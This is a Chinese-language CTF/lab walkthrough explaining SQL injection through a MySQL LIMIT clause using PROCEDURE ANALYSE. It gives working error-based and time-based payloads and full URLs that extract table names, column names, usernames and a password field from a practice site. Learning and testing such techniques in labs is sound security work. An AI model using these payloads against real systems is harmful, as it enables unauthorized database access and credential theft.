Mysql下Limit注入方法（此方法仅适用于5.0.0＜mysql＜5.6.6的版本）

SQL语句类似下面这样：（此方法仅适用于5.0.0<mysql<5.6.6的版本）

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT （注入点）

  问题的关键在于，语句中有 order by 关键字，mysql 中在 order by 前面可以使用 union 关键字，所以如果注入点前面没有 order by 关键字，就可以使用 union 关键字，但是现在的情况是，注入点前面有 order by 关键字。

我们先看看 mysql 5.x 的文档中的 select 的语法：

  SELECT[ALL | DISTINCT | DISTINCTROW ][HIGH_PRIORITY][STRAIGHT_JOIN][SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT][SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]select_expr [, select_expr ...][FROM table_references[WHERE where_condition][GROUP BY {col_name | expr | position}[ASC | DESC], ... [WITH ROLLUP]][HAVING where_condition][ORDER BY {col_name | expr | position}[ASC | DESC], ...][LIMIT {[offset,] row_count | row_count OFFSET offset}][PROCEDURE procedure_name(argument_list)][INTO OUTFILE 'file_name' export_options| INTO DUMPFILE 'file_name'| INTO var_name [, var_name]][FOR UPDATE | LOCK IN SHARE MODE]]

在LIMIT后面可以跟两个函数，PROCEDURE 和 INTO，INTO除非有写入shell的权限，否则是无法利用的，这里的重点是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE。

尝试用这个存储过程：

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);ERROR 1386 (HY000): Can't use ORDER clause with this procedure

ANALYSE支持两个参数，试试两个参数：

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);ERROR 1386 (HY000): Can't use ORDER clause with this procedure

在 ANALYSE 中插入 sql 语句，sleep 没有被执行，可以使用报错注入：

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

如果不支持报错注入的话，还可以基于时间注入，直接使用sleep不行，需要用BENCHMARK代替：

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

1.使用 PROCEDURE ANALYSE：

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0%20PROCEDURE%20ANALYSE(1)%23&num=1Can't use ORDER clause with this procedure
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

2.使用报错注入爆表：

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=8&num=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()))),1)%23XPATH syntax error: ':article,user'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

得到表名：article，user

3.爆列：

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x61727469636c65))),1)%23%20&num=100%20%23XPATH syntax error: ':id,title,contents,isread'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

得到article表的列名：id，title，contents，isread

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x75736572))),1)%23%20&num=100%20%23XPATH syntax error: ':id,username,password,lastloginI'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

同样得到user表的列名：id，username，password，lastloginI

4.爆字段：

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(username)%20from%20user))),1)%23%20&num=1XPATH syntax error: ':user,admin,flag'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

通过查询user表的username列，发现其中有一个字段是flag，那么直接读取flag字段的内容就可以了：

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(password)%20from%20user%20where%20username=0x666c6167))),1)%23%20&num=1XPATH syntax error: ':myflagishere'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

得到flag：myflagishere